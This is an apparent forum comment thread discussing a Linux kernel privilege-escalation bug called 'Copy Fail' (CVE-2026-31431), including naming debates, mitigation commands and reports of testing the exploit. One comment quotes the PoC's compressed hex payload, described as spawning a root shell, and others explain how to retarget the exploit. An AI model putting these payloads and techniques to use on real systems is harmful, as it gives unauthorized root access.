  • >As a code author/reviewer, I would never write "os as g" and I would absolutely never approve review of any code that used this.

    lucky for them, its an exploit script, not enterprise code.

    all that needs to be "reviewed" is whether or not it exploits the thing its supposed to.

    edit: yall really think a 10-line proof of concept script needs to undergo a code review? wild. i shouldnt be surprised that the top comment on a cool LPE exploit is complaining about variable naming

    • It's just sloppy. Readers are human, and little mistakes like this take away from the article. Then you add a nonexistent RHEL version, and it just isn't a good look. Which is a shame, because it's otherwise a very interesting vuln.

      Maybe you didn't care, but the length of this comment chain clearly shows that it matters. Effective communication is just as important as the engineering.

      7 replies →

What is the rationale behind naming CVEs and individual domains? Marketing?

  • The AI generated prose screams marketing. Marketing is why there's a "Contact our Security Team" form at the bottom of the page.

  • It's certainly marketing, but it's prosocial: there's no scarcity of names, and "copy.fail" is much easier to remember and talk about than "CVE-2026-31431".

  • can you remember what CVE-2021-44228 is without looking it up? CVE-2014-6271? CVE-2017-5753?

    i bet if i told you their names, you would instantly know what vulns those are.

    its easier to talk about things with names. it hurts no one. it takes approximately no effort or time.

    CVEs are, for whatever reason, like the only thing on the planet that people seem to have a problem with when they receive a name. i am not sure why.

    • > CVEs are, for whatever reason, like the only thing on the planet that people seem to have a problem with when they receive a name. i am not sure why.

      What, you guys talk about books based on their “title” instead of just memorising the ISBN of each book? Pssh, count me disappointed!

      2 replies →

  • Probably to some extent it is marketing, but generally it has to do with significant bug finds to get the message out to the people who need to apply patches and/or be informed. Heartbleed, Log4Shell, etc.

    Very few CVE’s get names dedicated to them like this, because usually when they do - it is very serious, as in this case.

  • Giving catchy names for bad exploits has been a thing for a while. Probably to make sure it's easy to reference and make sure you're patches as opposed to passing numbers around. Heartbleed, Shellshock, BEAST, Goto Fail, etc

  • Yes, originally it was to help spread awareness. Now it has become more of a gimmick I would say

I wonder if this is a problem for very old honeypods like the one on turris omnia, sold many years ago. Docker wasn't a thing these days and everything was done with lcx containers, if at all.

Quickly dove into this.

1. Yes, it's real.

2. Current chain can write any arbitrary content to any user-readable file (into the page cache).

3. Current chain relies on an available target suid binary that you can open() as a lowpriv user.

4. Current exploit relies on that binary being /bin/su and then being able to execve(/bin/sh, 0, 0) (which doesn't work on alpine, etc.). The former is easily replaced in the code. The latter needs a rebuilt payload ELF (also easy).

5. The authors say they have other chains (including ones that allow container escapes). I believe them.

6. A mildly de-minified PoC for Alpine with a new payload ELF is at hackerspace[pl]/~q3k/alpine.py . You'll need /bin/ping from iputils. This should be now somewhat reliable on any distro that has a `/bin/sh` and any setuid-and-readable binary (you'll just need to find it on your own).

> Any setuid-root binary readable by the user works.

Interesting detail. On Alpine, `/usr/bin/su` is not readable by any user, so the PoC doesn't work.

I suspect that the underlying issue can be exploited in other ways, but it makes me think that there's no reason for any suid binary to be world-readable.

For agents, if you are concerned about that, block access to "su" as it is interactive anyway. Not loading it into the memory will block the attack. If you are using AgentSH (https://www.agentsh.org) you can add a rule to block "su" and soon be able to block AF_ALG sockets if you want to further protect things.

  • This vulnerability can affect any file you can read. The PoC uses "su" but any setuid binary or any binary that root invokes or is already running as root is vulnerable, as well as many configuration files.

On the downside, I need to push new kernels to all my servers.

On this bright side, does this mean Magisk is coming to all unpatched Android phones?

  • No, Android doesn’t have suid binaries to exploit like in the PoC

    • The vulnerability can also be used on any binary that is already running as root and you can open for reading. So yes, any android app can now escalate to root if android has the vulnerable module.

      1 reply →

Looks like a LLM hallucination - there is no thing like "RHEL 14.3", although referenced kernel signature (6.12.0-124.45.1.el10_1) contains reference to real RHEL release, i.e. 10.1.

So this could be usable in lot of places with Python and Linux running? Not that I have too many Linux devices around. Still, might be handy sometimes on personal devices.

It looks like this is legit, but the script is very phishy and I wouldn't run it in unvirtualized or disposable systems.

https://github.com/theori-io/copy-fail-CVE-2026-31431/blob/m...

>zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))

This is not source code, this is binary, it's entirely possible that this contains a script that downloads another malicious script (or that simply contains the malicious commands)

That said, I understand why a terser script might have been prioritized.

EDIT: There's a couple of C ports in the comments that contain more details and no compressed payloads.

  • > This is not source code, this is binary, it's entirely possible that this contains a script that downloads another malicious script (or that simply contains the malicious commands)

    It doesn't, it's just a compressed ELF file that does setuid(0); execve(/bin/sh, 0, 0). You can just unzlib it and throw it in a disassembler.

Wow. I tried it on an old testing VM of Ubuntu 24.04 that had not been touched for a few months. Instant root with the bonus that any user that runs "su" gets root too. I updated the VM thinking it would be fixed afterward. Nope.

s6-overlay is a popular container image base for many self hosted services, and it uses an suid binary for startup. I wonder if this could be used to escape the container?

Can we just make a one-pager instead of this nonsense LLM bullet pointed list that is explaining this issue to your pointy-haired CEO instead of to sysadmins who understand the badness in 3 lines? Yeesh

I tried this exploit on Android and it looks like you need root in the first place to create an AF_ALG socket. I guess it is an SELinux policy to disable AF_ALG entirely.

I love how it says "Standalone PoC. Python 3.10+ stdlib only (os, socket, zlib). Targets /usr/bin/su by default; pass another setuid binary as argv[1]."

Except you can't pass another setuid binary as argv[1] because the AI writing this slop never added that feature to this python script.

I can't get it to work on any distro i've tried.

> Will you release the full PoC?

> Yes — it's on this page. We held it for a month while distros prepared patches; the major builds are out as of this writing.

There is no update available for Ubuntu 24, PoC works and just tried updating.

I tried this on NixOS, but it doesn't seem to be easily reproducible. There's no /usr/bin/su - okay, fine: I changed it to /run/wrappers/bin/su, but that didn't work, and I think the reason why is because the NixOS suid wrappers have +x but not +r:

    $ ls -lah /run/wrappers/bin/su
    -r-s--x--x 1 root root 70K Apr 27 11:09 /run/wrappers/bin/su

Not that this makes the underlying mechanism of the exploit any better, but I wonder what else you can do with it. Is there a way to target a suid binary that doesn't have +r? I guess all of the suid binaries necessarily don't, since the wrapper system doesn't grant it and you can't have suid binaries in the /nix/store.

I know it's also unrelated, but this is the most aggressively obvious LLM slop copy I've ever seen and it is a page with like 30 sentences. I guess we're just seriously doing this, huh?

  • It's the same with Gentoo, setuid binaries are installed without read permission.

    But modifying a setuid binary is just the demo exploit that was published with the vulnerability disclosure. The vulnerability actually allows modifying four bytes in any readable file. That means system configuration files, other binaries intended to be run by root, libraries... It's not limited to modifying setuid binaries.

You can tell security has become complete theatre when people are registering domains and setting up a whole fucking website for individual ones.

Use extreme caution running arbitrary code on your machines, especially obfuscated code that tickles kernel bugs! (edited)

  • The page explicitly describes that it is stealthy as it does not make permanent changes, only corrupting the binary in memory.

    • unfortunately the page can also lie to you haha. it seems people have reviewed the code by now, but running suspicious shellcode you don't fully understand is never a great idea.

      2 replies →

SUID binaries once again assisted a local privilege escalation attack. This is a major problem that distros can't keep ignoring.

  • There's a claim upthread that a straightforward variation works against /etc/passwd.

    • You can also just use this to patch libc and turn close() into close-but-also-give-me-a-root-shell().

> If your kernel was built between 2017 and the patch

This is why I compile my own kernel. I disable things I don't use. If it's not present it can't hurt you.

> block AF_ALG socket creation via seccomp regardless of patch state.

Likewise I use seccomp to only allow syscalls that are necessary. Everything else is disabled. In the programs I have that need to connect to a backend socket, that is done, and then socket creation is disabled.

  • Any pointers on how to set that up? Like, run all the things through strace, cut the first field, sort, uniq, run through some template and something somesuch what how?

Does anyone have a workaround for it? Edit: I don't understand why the comment would be downvoted.

  • I used, for debian based systems:

      printf "# CVE-2026-31431\nblacklist algif_aead\ninstall algif_aead /bin/false\n" | sudo tee /etc/modprobe.d/blacklist-algif_aead.conf >/dev/null && sudo update-initramfs -u

It does not behave as described on EndeavorOS (arch-based) running kernel 6.19.14-arch1-1. I receive the error:

Password: su: Authentication token manipulation error

I'm guessing this means it's already patched?

I'm impressed that such a serious problem popped up out of nowhere.

In my opinion, this mostly affects countries that are still using outdated systems, especially critical systems.

This gives bad actors a direct route to the root. Having an easily accessible root is not funny.

Yet, some people will still continue to say that "AI" isn't ready to replace (or strongly assist) our workflows, sure, some of the best humans devs left a vulnerability that serious (It's extremely serious, so many container as a service are vulnerable) for 9 years and an agent found it in 1 hour, maybe it's time to wake up and accept that it's UNSAFE to not use AI for security review as well?

  • A human security researcher found the core issue and an agent searched for where to apply it. I don’t think “an agent found it in one hour” is a fair summary of what happened.

    • "The starting insight — that splice() hands page-cache pages into the crypto subsystem and that scatterlist page provenance might be an under-explored bug class — came from human research by Taeyang Lee at Xint. From there, Xint Code scaled the audit across the entire crypto/ subsystem in roughly an hour. Copy Fail was the highest-severity finding in the run."

      So, if anything, this might argue against the presence of huge quantities of high-severity bugs in this part of the Linux kernel (that could be found by "Xint Code"-class scanning systems).

    • I was a bit rough, agreed, but the overall point is still correct, I kinda want to emphasize that I've also ran hundred of loops recently (combination of opus-4.6/gpt-5.4/gemini-3.1-pro-preview) toward a Rust codebase that we manage and that we deemed secure after many audits and found 2 serious issues as well in it, this was also audited externally by a third party that we've paid, which makes me genuinely scared of releasing anything without deep AI verification nowadays.

      Anybody has the same feeling?